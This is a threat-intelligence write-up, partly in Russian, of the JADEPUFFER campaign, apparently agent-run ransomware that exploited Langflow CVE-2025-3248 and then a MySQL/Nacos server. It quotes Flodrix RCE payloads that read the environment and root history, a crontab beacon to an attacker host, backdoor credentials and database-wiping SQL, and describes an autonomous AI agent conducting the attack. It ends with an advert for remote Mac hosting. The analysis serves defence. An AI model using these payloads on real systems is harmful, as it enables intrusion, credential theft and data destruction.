2026 JADEPUFFER
AGENTIC_
RANSOM_
FIRST_CASE.

JADEPUFFER агентный ransomware Langflow CVE-2025-3248 безопасность сервера

TL;DR: 1 июля 2026 Threat Research Team (TRT) Sysdig опубликовал первичный техотчёт о кампании JADEPUFFER — первой задокументированной end-to-end ransomware-операции, полностью управляемой LLM. Initial access: публичный Langflow через CVE-2025-3248 (CVSS 9.8). Lateral movement на production-хост MySQL + Alibaba Nacos. В сжатых временных окнах выполнено 600+ независимых payload: recon, credential harvest, persistence, config encryption, database wipe. Sysdig вводит класс Agentic Threat Actor (ATA). Ниже — полная kill chain, 4 линии доказательства автономности, Bitcoin-анomaly, IOC, defensive runbook и архитектурная матрица для Mac-разработчиков.

1. Attack surface: AI Agent infra как новый perimeter

Langflow / OpenClaw / ComfyUI Agent на Mac или cloud — три измеримых risk vector, напрямую коррелирующих с JADEPUFFER:

  1. Public exposure + unpatched = RCE 9.8: Langflow 70k+ GitHub stars; CVE-2025-3248 disclosed апрель 2025, CISA KEV 5 мая; EPSS exploit probability 91.42% (SentinelOne).
  2. Env vars = secret store: OpenAI/Anthropic/DeepSeek/Gemini keys + AWS/Azure/GCP/Alibaba/Tencent creds — parallel scan target Phase 1.
  3. Legacy CVE × agent automation → marginal cost → 0: downstream — Nacos CVE-2021-29441 + default JWT signing key; agent прогоняет historical exploit corpus почти бесплатно, TTP варьируются per incident.

2. Event summary & classification

ПараметрЗначение
DiscovererSysdig TRT, Michael Clark (Director of Threat Research)
Publish date1 июля 2026 (media 2–6 июля; mass awareness ~6 июля)
Threat actorJADEPUFFER (official Sysdig casing)
Core claimПервый end-to-end LLM-driven ransomware — recon → impact без human-in-the-loop на critical path
New taxonomyAgentic Threat Actor (ATA) — capability delivered by AI agent, not manual toolchains
Two-stage targetEntry: public Langflow (CVE-2025-3248); real target: MySQL + Nacos production
Scale600+ distinct purpose-built payloads across multi-session timeline (weeks)

3. Timeline

ДатаСобытие
Апрель 2025CVE-2025-3248 в Langflow (unauth code injection / RCE)
5 мая 2025CISA KEV listing
2025Same vuln → Flodrix botnet (Trend Micro, independent op)
Июнь 2026JADEPUFFER hits public Langflow; kill chain over weeks, multiple sessions
1 июля 2026Sysdig full technical report
2–6 июля 2026Dark Reading, BleepingComputer, CyberScoop, CSO Online, Security Affairs

4. CVE-2025-3248 — deep dive

4.1 Spec sheet

ПолеДанные
ComponentLangflow — open-source visual AI agent orchestrator, 70k+ GitHub stars
WeaknessCWE-94 (code injection) + CWE-306 (missing auth on critical function)
CVSS9.8 Critical — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AffectedAll Langflow < 1.3.0
Endpoint/api/v1/validate/code
Fix1.3.0 (auth gate)
EPSS91.42%

4.2 Root cause chain (5 steps)

  1. Langflow exposes code validation for custom function nodes in visual pipeline.
  2. Implementation: ast.parse()compile()exec().
  3. Critical gap: zero authentication, zero sandbox.
  4. Python decorators + default args evaluate at definition time — malicious code in defaults/decorators = RCE on validate.
  5. Attacker needs no login; crafted HTTP POST = arbitrary code execution.

4.3 Flodrix reference payload (Trend Micro, separate campaign)

exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))') exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))') exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))') exec('raise Exception(__import__("subprocess").check_output("ip addr show", shell=True))')

Sequence: privesc check → env dump (API keys) → root history → network recon → SSH/capabilities → 700-byte Bash stager pulls Flodrix ELF for DDoS botnet. Important: Flodrix ≠ JADEPUFFER; shared entry CVE-2025-3248 only.

4.4 Patch (Langflow 1.3.0)

post_validate_code injects _current_user: CurrentActiveUser: JWT Bearer or x-api-key required; 401/403 before vulnerable code path.

5. Kill chain reconstruction (Sysdig raw telemetry)

5.1 Why Langflow?

Agent servers aggregate LLM API keys + cloud creds in env; rushed prod deploys skip network ACLs and patch cadence.

5.2 Phase 1: Langflow host compromise

All payloads: Base64-encoded Python via RCE endpoint.

① Recon + credential harvest (multithreaded parallel): id, uname -a, hostname; parallel scan OpenAI/Anthropic/DeepSeek/Gemini keys, multi-cloud creds, crypto wallets/mnemonics, DB creds.

② Local exfil: dump Langflow PostgreSQL backend (creds/API keys), local review, trace cleanup.

③ Internal lateral discovery: internal address space scan, default cred probes on DB/object storage/secret stores.

④ MinIO enumeration (forensic smoking gun): probe minio.internal:9000, 127.0.0.1:9000, default minioadmin:minioadmin, full bucket listing; priority terraform-state + credentials.json. Adaptive loop: JSON request → XML response → next payload switches parser — classic probe-error-correct closed loop.

⑤ Persistence: crontab beacon every 30 min:

*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"

5.3 Phase 2: MySQL + Nacos production server

① Multi-vector Nacos attack: CVE-2021-29441 auth bypass, default JWT signing key forgery, backdoor admin inject via root DB privileges.

31-second backdoor fix loop (Sysdig, UTC-precision):

Time (UTC)Action
19:34:24bcrypt hash gen, insert xadmin
19:34:36login xadmin:Xploit@2026# fail
19:34:48parallel: nacos:nacos + regenerate admin123 hash
19:35:07import bcrypt, delete corrupt row, rebuild
19:35:18login success — total 31 s

② Container escape probing (~8 min): MySQL INTO OUTFILE / LOAD_FILE, Docker socket, cgroup, UDF load tests; cleanup marker after — agent phase-transition signal, not static script behavior.

③ Destructive encryption: all 1,342 Nacos configs via AES_ENCRYPT(); delete config_info + his_config_info; ransom table README_RANSOM. Key from uuid4(), stdout only — no recovery even if ransom paid. Claims AES-256; MySQL default = AES-128-ECB.

④ Mass destruction: ROI-prioritized DROP DATABASE; comment claims backup at 64.20.53[.]230 (Sysdig: no independent confirmation). FK constraint fail → auto SET GLOBAL FOREIGN_KEY_CHECKS=0 — understands failure mode, not blind retry.

6. Four autonomy evidence lines

  1. Self-narrating payloads: natural-language comments on ROI sort, DB size heuristics — LLM codegen fingerprint.
  2. Machine-speed fault diagnosis: 31s Nacos fix, MinIO XML/JSON adaptation, JWT path pivot — evidence in correction latency + method.
  3. Semantic context parsing: free-text in target env interpreted into actions only possible if "read"; repeated across sessions weeks apart.
  4. Bitcoin address anomaly — dual interpretation open; new attribution uncertainty from agent autonomy.

7. Bitcoin address anomaly

Ransom addr 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy = standard P2SH example address in Bitcoin Core docs, heavily represented in LLM training corpora. On-chain: 737 txs, ~46 BTC cumulative, zero balance (immediate forward). Sysdig: (a) LLM hallucination, third-party sweep wallet; (b) attacker-chosen real wallet, coincidental collision. System prompt unknown — both hypotheses non-excludable.

8. IOC summary

TypeIndicator
C2 / beacon45.131.66[.]106; crontab: hxxp://45.131.66[.]106:4444/beacon
Staging/exfil64.20.53[.]230 (InterServer, AS19318)
Initial accessCVE-2025-3248
Bitcoin3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
Contacte78393397[@]proton[.]me (0 TI hits)
Ransom tableREADME_RANSOM (atypical vs WARNING/RECOVER_YOUR_DATA)
PersistenceCrontab beacon q30min → C2:4444

9. Official defense recommendations (Sysdig)

  • Patch Langflow ≥1.3.0; never expose code exec/validate endpoints to internet.
  • Runtime threat detection on anomalous DB process behavior.
  • No LLM API keys or cloud creds in env vars on orchestrator hosts — dedicated secret manager (Vault, 1Password Connect, cloud Secrets).
  • Harden Nacos: rotate default token.secret.key, enforce auth, never public, no root DB access.
  • DB admin accounts not internet-exposed; strong creds + source IP allowlists.
  • Egress control against C2 beacons.
  • IOC monitoring, cron outbound requests, bracket-wrapped User-Agent anomalies.

10. Industry reaction

BleepingComputer, Dark Reading, CyberScoop, Security Affairs frame as first fully AI-driven ransomware; ATA era narrative. CSO Online quotes red team lead Vibhum Dubey: execution evolution, not new ransomware paradigm — critical window is pre-encryption quiet phase where agents map identity/trust chains and pivot TTP on block. LLMjacking: stolen creds drive agent ops → marginal attack cost → 0.

11. Sysdig conclusions (4 points)

  1. Ransomware skill floor collapsed: LLM agent chains recon → impact without deep exploit craft.
  2. Legacy CVE weaponization at scale: 2021 Nacos + default JWT; historical exploit corpus near-zero marginal cost.
  3. Readable intent = defensive signal: payload narration = new detection surface.
  4. "Backed up" is attacker claim only: ephemeral keys, irreversible data loss.

Bottom line: JADEPUFFER is an early warning — no single technique is novel; the LLM agent chains known TTPs into full ransomware ops against neglected public AI infra. Skill bar = cost of running an agent; with LLMjacking, attacker marginal cost ≈ 0. Expect volume and TTP diversity to climb.

12. Decision matrix: AI orchestration infra

Deploy modelExposure riskSecret isolationUse caseJADEPUFFER link
Local Mac, Langflow public-mappedCriticalPoor (.env plaintext)Local demo onlyClassic pivot host
Cloud VPS + unpatched LangflowCriticalPoorNot recommendedIdentical to incident entry
Intranet Langflow + secret managerMediumGoodSmall prodRequires egress control
Isolated remote Mac node + SSH tunnelLowGoodAgent dev/testNo public entry, snapshot rollback

13. Five-step defense runbook

  1. Immediate patch: Langflow ≥1.3.0; Shodan/Censys for reachable /api/v1/validate/code.
  2. Remove public exposure: Langflow, Nacos, MySQL admin ports internal/VPN/Tailscale only; validate endpoint never public.
  3. Credentials out of env: Vault/1Password Connect/cloud Secrets; orchestrator mounts short-lived tokens only.
  4. Harden Nacos: rotate JWT key, disable root DB, enable auth; audit CVE-2021-29441 family.
  5. Runtime detection + IOC hunt: Falco/Sysdig; alert on cron egress, MySQL INTO OUTFILE, README_RANSOM table creation; match IOCs above.

14. Mac developer architecture in ATA era

JADEPUFFER = paradigm shift: exploit authors replaced by agent configurators. Langflow/OpenClaw/MLX on Mac → dev machine and agent prod must be physically or logically isolated.

Langflow pivot root cause: (1) public reachability (2) credential-rich env vars (3) same segment as MinIO/terraform-state. Mac mini prototype with real API keys = exact "hasty deploy" pattern.

LLMjacking positive feedback: stolen OpenAI/Anthropic creds → agent-driven next-stage attacks → more creds. Exposed Mac with keys + agent admin ports = victim and ammo depot.

Windows/Linux VPS can host Langflow but lose on Xcode toolchain, Cursor/Claude Code co-dev, Apple Silicon MLX local inference throughput. Fix: layer separation — isolated Mac without prod keys, SSH tunnel access, one-click snapshot rollback on compromise.

15. References

  • Sysdig «JADEPUFFER: Agentic ransomware for automated database extortion» (primary report)
  • BleepingComputer, Dark Reading, CyberScoop, CSO Online (Vibhum Dubey), Security Affairs
  • Trend Micro — CVE-2025-3248 / Flodrix botnet
  • NVD / SentinelOne / Zscaler — CVE-2025-3248; CISA KEV catalog

16. Closing: don't run agent dev bare-metal on prod Mac — isolated remote node

JADEPUFFER proves: public AI orchestrator + API keys in env vars = top-tier 2026 risk combo. Windows/Linux cloud can run Langflow, but Apple Silicon Mac wins on terminal AI toolchain co-dev, MLX local inference throughput, and snapshot rollback control. For isolated Langflow/OpenClaw agent workflow validation without commingling prod keys/data: MACGPU remote Mac mini M4 node — no public port mapping, on-demand lifecycle, snapshot rebuild on breach. Metal-backed unified memory keeps agent iteration latency low while SSH tunnel keeps attack surface at zero public endpoints.